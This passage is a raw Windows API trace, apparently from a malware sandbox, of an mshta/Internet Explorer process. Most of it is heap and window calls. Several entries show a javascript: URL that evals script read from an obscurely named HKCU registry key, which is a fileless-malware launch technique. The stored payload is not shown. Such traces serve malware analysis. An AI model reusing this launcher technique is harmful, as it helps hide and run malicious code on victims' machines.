hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] IntersectRect (in: lprcDst=0x18f444, lprcSrc1=0x18f444, lprcSrc2=0x18f414 | out: lprcDst=0x18f444) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f434 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f454 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x18f104, lprcSrc1=0x18f104, lprcSrc2=0x18f0d4 | out: lprcDst=0x18f104) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f0f4 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f114 | out: lprcDst=0x656950) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f018, lprcSrc1=0x18f018, lprcSrc2=0x656940 | out: lprcDst=0x18f018) returned 1 [0075.611] UnionRect (in: lprcDst=0x18f320, lprcSrc1=0x18f320, lprcSrc2=0x18f2cc | out: lprcDst=0x18f320) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f1c8, lprcSrc1=0x18f1c8, lprcSrc2=0x18f250 | out: lprcDst=0x18f1c8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f260, lprcSrc1=0x18f260, lprcSrc2=0x18f1c8 | out: lprcDst=0x18f260) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f1c8, lprcSrc1=0x18f1c8, lprcSrc2=0x18f250 | out: lprcDst=0x18f1c8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f260, lprcSrc1=0x18f260, lprcSrc2=0x18f1c8 | out: lprcDst=0x18f260) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] UnionRect (in: lprcDst=0x18f660, lprcSrc1=0x18f660, lprcSrc2=0x18f60c | out: lprcDst=0x18f660) returned 1 [0075.611] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682a18 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682a18 | out: hHeap=0x610000) returned 1 [0075.611] RedrawWindow (hWnd=0x0, lprcUpdate=0x18f6e0, hrgnUpdate=0x0, flags=0x21) returned 1 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca78 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4) returned 0x65cb08 [0075.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682a18 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682bf8 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.613] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.614] GetCurrentThreadId () returned 0x2a8 [0075.614] GetCurrentThreadId () returned 0x2a8 [0075.614] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x659fb0, Size=0x6c) returned 0x67d6a0 [0075.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.614] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.615] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.616] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682bf8 | out: hHeap=0x610000) returned 1 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca78 | out: hHeap=0x610000) returned 1 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682a18 | out: hHeap=0x610000) returned 1 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cb08 | out: hHeap=0x610000) returned 1 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.617] GetFocus () returned 0x0 [0075.617] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f6d8 | out: ppu=0x18f6d8) returned 0x0 [0075.734] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0075.734] IUri:GetAbsoluteUri (in: This=0x63be1c, pbstrAbsoluteUri=0x18f758 | out: pbstrAbsoluteUri=0x18f758*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0075.735] IUnknown:Release (This=0x63be1c) returned 0x3 [0075.935] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f550 | out: lpPoint=0x18f550) returned 0 [0075.935] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0075.937] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0075.937] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x18f348, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0075.937] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.937] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.937] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xe) returned 0x6870a8 [0076.415] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f260 | out: ppu=0x18f260) returned 0x0 [0076.415] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0076.415] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18e7d4 | out: pdwScheme=0x18e7d4*=0xf) returned 0x0 [0076.415] IUri:GetDisplayUri (in: This=0x63be1c, pbstrDisplayString=0x18e7e0 | out: pbstrDisplayString=0x18e7e0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0076.415] GetWindowTextW (in: hWnd=0x40162, lpString=0x18e380, nMaxCount=512 | out: lpString="") returned 0 [0076.415] SetWindowTextW (hWnd=0x40162, lpString="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0 [0076.415] IUnknown:Release (This=0x63be1c) returned 0x3 [0076.416] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0076.416] SendMessageW (hWnd=0x50116, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0076.416] NtdllDefWindowProc_W () returned 0x0 [0076.417] NtdllDefWindowProc_W () returned 0x0 [0076.417] NtdllDefWindowProc_W () returned 0x0 [0076.417] SendMessageW (hWnd=0x40162, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0076.417] SetWindowLongW (hWnd=0x40162, nIndex=-16, dwNewLong=-2100363264) returned 0 [0076.417] SetWindowLongW (hWnd=0x40162, nIndex=-20, dwNewLong=262144) returned 0 [0076.417] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 0 [0076.417] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.417] SetPropW (hWnd=0x50116, lpString=0x0, hData=0x50116) returned 0 [0076.417] ShowWindow (hWnd=0x40162, nCmdShow=0) returned 0 [0076.418] UpdateWindow (hWnd=0x40162) returned 0 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f0b8 | out: lpPoint=0x18f0b8) returned 0 [0076.696] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0076.696] GetCurrentThreadId () returned 0x2a8 [0076.696] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0076.696] GetCurrentThreadId () returned 0x2a8 [0076.696] GetFocus () returned 0x0 [0076.697] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x67d6a0, Size=0x9c) returned 0x67a350 [0076.697] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned -9 [0076.697] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned -9 [0077.073] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f610 | out: lpPoint=0x18f610) returned 0 [0077.074] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.075] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 0 [0077.075] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.075] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.075] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f5b0 | out: lpPoint=0x18f5b0) returned 0 [0077.075] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.075] GetCurrentThreadId () returned 0x2a8 [0077.075] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 0 [0077.076] PostMessageW (hWnd=0x202ac, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.076] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.076] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f690 | out: lpPoint=0x18f690) returned 0 [0077.076] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.077] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f678 | out: lpPoint=0x18f678) returned 0 [0077.077] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x644ee8) returned 0x0 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x621980 | out: hHeap=0x610000) returned 1 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870c0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d9b8 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f928 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f6f8, lprcSrc1=0x18f6f8, lprcSrc2=0x18f780 | out: lprcDst=0x18f6f8) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f790, lprcSrc1=0x18f790, lprcSrc2=0x18f6f8 | out: lprcDst=0x18f790) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f7e8, lprcSrc1=0x18f7e8, lprcSrc2=0x18f780 | out: lprcDst=0x18f7e8) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652e68 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x656798 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6568f0 | out: hHeap=0x610000) returned 1 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650760 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6337a8 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650fc0 | out: hHeap=0x610000) returned 1 [0077.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f804 | out: phkResult=0x18f804*=0x2d4) returned 0x0 [0077.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f808 | out: phkResult=0x18f808*=0x2f8) returned 0x0 [0077.079] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0077.079] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0077.079] RegCloseKey (hKey=0x0) returned 0x6 [0077.079] RegCloseKey (hKey=0x0) returned 0x6 [0077.079] RegCloseKey (hKey=0x2d4) returned 0x0 [0077.079] RegCloseKey (hKey=0x2f8) returned 0x0 [0077.079] GetCurrentThreadId () returned 0x2a8 [0077.079] GetCurrentThreadId () returned 0x2a8 [0077.080] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.080] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df50 | out: hHeap=0x610000) returned 1 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] IUnknown:Release (This=0x65e300) returned 0x1 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f7f8 | out: ppv=0x18f7f8*=0x6368d8) returned 0x0 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] free (_Block=0x28c3048) [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] IUnknown:Release (This=0x6738a8) returned 0x0 [0077.082] ??3@YAXPAX@Z () returned 0x1 [0077.082] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] free (_Block=0x28c1058) [0077.083] free (_Block=0x28c36f8) [0077.083] free (_Block=0x28c10a0) [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] free (_Block=0x28c1f88) [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76766460, dwCookie=0x100) returned 0x0 [0077.084] StdGlobalInterfaceTable:IUnknown:Release (This=0x3bffa0) returned 0x1 [0077.084] IUnknown:Release (This=0x6368d8) returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] IUnknown:Release (This=0x6368d8) returned 0x0 [0077.084] ISystemDebugEventFire:EndSession (This=0x65e300) returned 0x0 [0077.084] IUnknown:Release (This=0x65e300) returned 0x0 [0077.085] GetUserDefaultLCID () returned 0x409 [0077.085] GetACP () returned 0x4e4 [0077.085] ??3@YAXPAX@Z () returned 0x1 [0077.085] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66bce0 | out: hHeap=0x610000) returned 1 [0077.085] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509a0 | out: hHeap=0x610000) returned 1 [0077.085] ??3@YAXPAX@Z () returned 0x1 [0077.085] GetCurrentThreadId () returned 0x2a8 [0077.086] free (_Block=0x28c12d8) [0077.086] ??3@YAXPAX@Z () returned 0x1 [0077.086] ??3@YAXPAX@Z () returned 0x1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66cdb8 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df68 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650f68 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d1b0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650910 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f140 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6707e0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df80 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] IUnknown:Release (This=0x643e78) returned 0x0 [0077.087] IUnknown:Release (This=0x642934) returned 0x0 [0077.087] IUnknown:Release (This=0x750296bc) returned 0x1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6499b0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f338 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870a8 | out: hHeap=0x610000) returned 1 [0077.087] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x18f89c | out: ppURI=0x18f89c*=0x63baa4) returned 0x0 [0077.087] IUri:GetScheme (in: This=0x63baa4, pdwScheme=0x18f834 | out: pdwScheme=0x18f834*=0x11) returned 0x0 [0077.087] IUnknown:QueryInterface (in: This=0x63baa4, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f83c | out: ppvObject=0x18f83c*=0x63baa4) returned 0x0 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] IUri:IsEqual (in: This=0x63be1c, pUri=0x63baa4, pfEqual=0x18f87c | out: pfEqual=0x18f87c*=0) returned 0x0 [0077.088] IUnknown:Release (This=0x63be1c) returned 0x2 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.088] IUri:GetAbsoluteUri (in: This=0x63baa4, pbstrAbsoluteUri=0x644cb8 | out: pbstrAbsoluteUri=0x644cb8*="about:blank") returned 0x0 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] GetCurrentProcessId () returned 0x5bc [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 